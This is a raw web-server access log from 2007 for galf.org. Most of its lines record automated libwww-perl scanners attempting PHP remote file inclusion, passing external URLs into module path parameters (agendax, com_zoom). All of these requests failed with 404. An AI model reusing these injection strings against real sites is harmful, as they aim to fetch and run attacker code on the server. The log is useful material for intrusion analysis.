194.51.100.250 - - [03/Sep/2007:04:32:14 -0700] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
212.90.210.101 - - [03/Sep/2007:04:34:10 -0700] "GET /logs/index.php?id=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
212.90.210.101 - - [03/Sep/2007:04:34:10 -0700] "GET /index.php?id=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
84.234.74.220 - - [03/Sep/2007:04:35:10 -0700] "GET /logs/access_070716.log//modules/agendax/addevent.inc.php?agendax_path=http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
84.234.74.220 - - [03/Sep/2007:04:35:11 -0700] "GET //modules/agendax/addevent.inc.php?agendax_path=http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
84.234.74.220 - - [03/Sep/2007:04:35:11 -0700] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
84.234.74.220 - - [03/Sep/2007:04:36:02 -0700] "GET /logs/access_070604.log//modules/agendax/addevent.inc.php?agendax_path=http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65"
194.51.100.250 - - [03/Sep/2007:04:38:00 -0700] "GET /logs/access_070618.log//modules/agendax/addevent.inc.php?agendax_path=http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65"
8.6.221.100 - - [03/Sep/2007:04:39:07 -0700] "GET /logs/access_070716.log//modules/agendax/addevent.inc.php?agendax_path=http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.807" "www.galf.org"
8.6.221.100 - - [03/Sep/2007:04:39:11 -0700] "GET //modules/agendax/addevent.inc.php?agendax_path=http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.807" "www.galf.org"
8.6.221.100 - - [03/Sep/2007:04:39:11 -0700] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.807" "www.galf.org"
8.6.221.100 - - [03/Sep/2007:04:40:19 -0700] "GET /logs/access_070604.log//modules/agendax/addevent.inc.php?agendax_path=http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.807" "www.galf.org"
200.226.246.22 - - [03/Sep/2007:04:43:05 -0700] "GET /logs/access_070716.log//modules/agendax/addevent.inc.php?agendax_path=http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
200.226.246.22 - - [03/Sep/2007:04:43:05 -0700] "GET //modules/agendax/addevent.inc.php?agendax_path=http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
200.226.246.22 - - [03/Sep/2007:04:43:06 -0700] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
200.226.246.22 - - [03/Sep/2007:04:44:26 -0700] "GET /logs/access_070604.log//modules/agendax/addevent.inc.php?agendax_path=http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
193.201.200.161 - - [03/Sep/2007:04:50:43 -0700] "GET /logs/access_070618.log//modules/agendax/addevent.inc.php?agendax_path=http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.74" "www.galf.org"
193.201.200.161 - - [03/Sep/2007:04:50:43 -0700] "GET //modules/agendax/addevent.inc.php?agendax_path=http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.74" "www.galf.org"
193.201.200.161 - - [03/Sep/2007:04:50:43 -0700] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.74" "www.galf.org"
193.201.200.161 - - [03/Sep/2007:04:50:44 -0700] "GET /logs/access_070716.log//modules/agendax/addevent.inc.php?agendax_path=http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.74" "www.galf.org"
68.142.212.190 - - [03/Sep/2007:04:51:46 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.galf.org"
80.252.144.2 - - [03/Sep/2007:04:55:25 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
80.252.144.2 - - [03/Sep/2007:04:55:26 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
201.231.137.80 - - [03/Sep/2007:04:55:44 -0700] "GET /logs/access_070709.log HTTP/1.1" 200 1121534 "-" "-" "www.galf.org"
74.6.20.70 - - [03/Sep/2007:04:58:51 -0700] "GET /tmp/ HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
74.6.24.220 - - [03/Sep/2007:04:59:31 -0700] "GET /tmp/?M=A HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
74.6.25.102 - - [03/Sep/2007:05:01:09 -0700] "GET /tmp/?N=D HTTP/1.0" 200 504